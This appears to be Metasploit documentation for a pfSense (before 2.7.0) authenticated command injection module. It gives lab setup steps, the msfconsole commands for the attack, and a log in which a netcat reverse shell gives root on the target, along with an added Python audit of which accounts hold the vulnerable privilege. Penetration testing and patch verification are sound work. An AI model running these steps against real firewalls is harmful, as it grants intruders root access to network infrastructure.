metasploit-gs/documentation/modules/exploit/unix/http/pfsense_config_data_exec.md
2025-07-17 09:53:40 +01:00

Vulnerable Application

This module exploits an authenticated command injection vulnerability in the restore_rrddata() function of pfSense prior to 2.7.0. An authenticated attacker with the WebCfg - Diagnostics: Backup & Restore privilege can execute arbitrary operating system commands as the root user.

This module has been tested successfully on version 2.6.0-RELEASE.
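
To see which accounts could reach this bug on a firewall you administer, the following added example (not part of the module or of pfSense) lists the enabled users in a config.xml backup that hold the Backup & Restore privilege, either directly or through a group. The privilege ids, the element layout and the sample data are assumptions made for this illustration.

```python
import xml.etree.ElementTree as ET

# Assumed ids (not from the page): config.xml names for the privileges
# "WebCfg - Diagnostics: Backup & Restore" and "WebCfg - All pages".
RISKY_PRIVS = {"page-diagnostics-backup-restore", "page-all"}

def accounts_with_restore_priv(config_xml):
    """Map user name -> sorted reasons the account can reach Backup & Restore."""
    system = ET.fromstring(config_xml).find("system")
    if system is None:
        return {}
    # uid -> names of the groups that grant a risky privilege
    group_grants = {}
    for group in system.findall("group"):
        if RISKY_PRIVS & {p.text for p in group.findall("priv")}:
            for member in group.findall("member"):
                group_grants.setdefault(member.text, []).append(group.findtext("name"))
    result = {}
    for user in system.findall("user"):
        # Assumption: a <disabled> element marks an account that cannot log in.
        if user.find("disabled") is not None:
            continue
        reasons = [f"direct:{p.text}" for p in user.findall("priv")
                   if p.text in RISKY_PRIVS]
        reasons += [f"group:{name}"
                    for name in group_grants.get(user.findtext("uid"), [])]
        if reasons:
            result[user.findtext("name")] = sorted(reasons)
    return result

# Constructed sample input, not taken from a real firewall.
SAMPLE = """<pfsense><system>
  <group><name>admins</name><member>0</member><priv>page-all</priv></group>
  <group><name>helpdesk</name><member>2000</member><member>2001</member>
    <priv>page-diagnostics-backup-restore</priv></group>
  <user><name>admin</name><uid>0</uid></user>
  <user><name>alice</name><uid>2000</uid></user>
  <user><name>bob</name><uid>2001</uid><disabled/></user>
  <user><name>carol</name><uid>2002</uid>
    <priv>page-diagnostics-backup-restore</priv></user>
  <user><name>dave</name><uid>2003</uid><priv>page-dashboard-all</priv></user>
</system></pfsense>"""

if __name__ == "__main__":
    for name, reasons in accounts_with_restore_priv(SAMPLE).items():
        print(f"{name}: {', '.join(reasons)}")
```

Every account it reports on a release prior to 2.7.0 is one whose credentials are equivalent to root on the firewall.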

Installing the Application

Download the ISO from pfSense 2.6.0-RELEASE and then create a VMware or VirtualBox VM using this ISO.

When prompted for the installation method, you may wish to choose the BIOS boot method rather than ZFS or UEFI for testing purposes, just to simplify setup. Otherwise you can accept the default settings.

Once installation is finished you should be prompted to reboot. Reboot, then enter n when asked if you want to set up VLANs.

At the WAN prompt, enter em0, which should work, or whichever option other than "a" appears in the prompt, then hit ENTER.

Wait for setup to complete, then browse to http://<IP ADDRESS SHOWN HERE>/, replacing the placeholder with the IP address shown in the prompt. You should see the login page for pfSense.

Log in with username admin and password pfsense. A setup GUI should appear. Accept all the defaults, clicking Next at each step and then Finish at the final step. Finally click Accept on the export warning page and Close on the following popup. You should now see the main dashboard and should be ready to test the module.

Verification Steps

  1. Start msfconsole
  2. Do: use exploit/unix/http/pfsense_config_data_exec
  3. Do: set RHOST [IP]
  4. Do: set USERNAME [username]
  5. Do: set PASSWORD [password]
  6. Do: set LHOST [IP]
  7. Do: exploit

Options

Scenarios

pfSense Community Edition 2.6.0-RELEASE

msf exploit(unix/http/pfsense_config_data_exec) > use exploit/unix/http/pfsense_config_data_exec 
[*] Using configured payload cmd/unix/reverse_netcat
msf exploit(unix/http/pfsense_config_data_exec) > set RHOST 1.1.1.1
RHOST => 1.1.1.1
msf exploit(unix/http/pfsense_config_data_exec) > set LHOST 2.2.2.2
LHOST => 2.2.2.2
msf exploit(unix/http/pfsense_config_data_exec) > exploit

[*] Started reverse TCP handler on 2.2.2.2:4444 
[*] pfSense version: 2.6.0-RELEASE
[+] The target is vulnerable.
[*] Command shell session 1 opened (2.2.2.2:4444 -> 1.1.1.1:21942) at 2023-03-26 02:10:48 +0300

id
uid=0(root) gid=0(wheel) groups=0(wheel)
whoami
root